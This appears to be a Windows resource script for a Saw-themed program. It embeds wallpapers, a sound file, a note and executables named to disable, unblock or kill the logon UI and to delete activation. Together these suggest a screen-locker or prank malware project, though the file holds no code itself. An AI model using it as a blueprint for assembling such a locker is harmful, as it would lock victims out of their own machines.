Code1 RCDATA "code\\1.txt"
Code10 RCDATA "code\\10.txt"
Code11 RCDATA "code\\11.txt"
Code12 RCDATA "code\\12.txt"
Code13 RCDATA "code\\13.txt"
Code14 RCDATA "code\\14.txt"
Code15 RCDATA "code\\15.txt"
Code2 RCDATA "code\\2.txt"
Code3 RCDATA "code\\3.txt"
Code4 RCDATA "code\\4.txt"
Code5 RCDATA "code\\5.txt"
Code6 RCDATA "code\\6.txt"
Code7 RCDATA "code\\7.txt"
Code8 RCDATA "code\\8.txt"
Code9 RCDATA "code\\9.txt"
Text1 RCDATA "text\\1.txt"
Text2 RCDATA "text\\2.txt"
Text3 RCDATA "text\\3.txt"
Text4 RCDATA "text\\4.txt"
Text5 RCDATA "text\\5.txt"
SawWall RCDATA "images\\650628.jpg"
JpgImage_1 RCDATA "images\\7dUGQGR-saw-movie-wallpaper.jpg"
JpgImage_2 RCDATA "images\\AtJTr4T-saw-movie-wallpaper.jpg"
Bitmap_7 BITMAP "images\\images.bmp"
JpgImage_3 RCDATA "images\\jlyCNyi-saw-movie-wallpaper.jpg"
JpgImage_4 RCDATA "images\\oCTM44M-saw-3-wallpaper.jpg"
JpgImage_5 RCDATA "images\\qA0B9mZ-saw-movie-wallpaper.jpg"
JpgImage_6 RCDATA "images\\vjub6pl-saw-movie-wallpaper.jpg"
JpgImage_7 RCDATA "images\\w75RBg0-saw-movie-wallpaper.jpg"
LogOn RCDATA "Exe\\DisableLogonUI.exe"
Resource_1 RCDATA "note.txt"
SAWMP3 RCDATA "sounds\\Win32 Saw.mp3"
Activate RCDATA "Exe\\DeleteActivate.exe"
UnblockLogOn RCDATA "Exe\\UnblockLogonUI.exe"
block RCDATA "Exe\\end\\Win32\\Debug\\SAWKill.exe"
ReSAW RCDATA "Exe\\RemoveSAW.exe"
End RCDATA "Exe\\GG.exe"
